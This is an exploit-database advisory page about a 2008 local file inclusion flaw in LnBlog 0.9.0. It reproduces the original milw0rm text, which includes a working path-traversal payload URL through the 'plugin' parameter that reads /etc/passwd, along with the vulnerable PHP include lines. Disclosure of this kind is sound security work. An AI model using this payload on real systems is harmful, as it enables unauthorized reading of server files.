LnBlog - exploit.company

vendor:

LnBlog

by:

dun

7.5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: LnBlog

Affected Version From: 0.9.0

Affected Version To: 0.9.0

Patch Exists: YES

Related CWE: N/A

CPE: a:lnblog:lnblog

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

LnBlog <= 0.9.0 Local File Inclusion Vulnerability

LnBlog is a cross-platform, file-based weblog/mini-CMS. A vulnerability exists in the showblog.php file of the LnBlog 0.9.0 version, which allows an attacker to include arbitrary local files via the 'plugin' parameter. This can be exploited to disclose sensitive information, such as the /etc/passwd file.

Mitigation:

Upgrade to the latest version of LnBlog, which is not vulnerable to this attack.

Source

Exploit-DB raw data:

  :::::::-.   ...    ::::::.    :::.
   ;;,   `';, ;;     ;;;`;;;;,  `;;;
   `[[     [[[['     [[[  [[[[[. '[[
    $$,    $$$$      $$$  $$$ "Y$c$$
    888_,o8P'88    .d888  888    Y88
    MMMMP"`   "YmmMMMM""  MMM     YM

   [ Discovered by dun \ dun[at]strcpy.pl ]

 ###############################################################
 #  [ LnBlog <= 0.9.0 ]   Local File Inclusion Vulnerability   #
 ###############################################################
 #
 # Script: "LnBlog A cross-platform, file-based weblog/mini-CMS."
 #
 # Script site: http://lnblog.skepticats.com/
 # Download: http://lnblog.skepticats.com/content/download/
 #	     http://sourceforge.net/projects/lnblog/
 #
 # Vuln: http://site.com/[lnblog-0.9.0]/pages/showblog.php?plugin=../../../../../../../etc/passwd%00
 #      
 #
 # Bug: ./lnblog-0.9.0/pages/showblog.php (lines: 109,110)
 #
 # ...
 #	} elseif ( isset($_GET['plugin']) ) {
 #		require_once("plugins/".$_GET['plugin'].".php");
 # ... 	 
 #
 #
 ###############################################
 # Greetz: D3m0n_DE * str0ke * and otherz..
 ###############################################

 [ dun / 2008 ] 

*******************************************************************************************

# milw0rm.com [2008-09-27]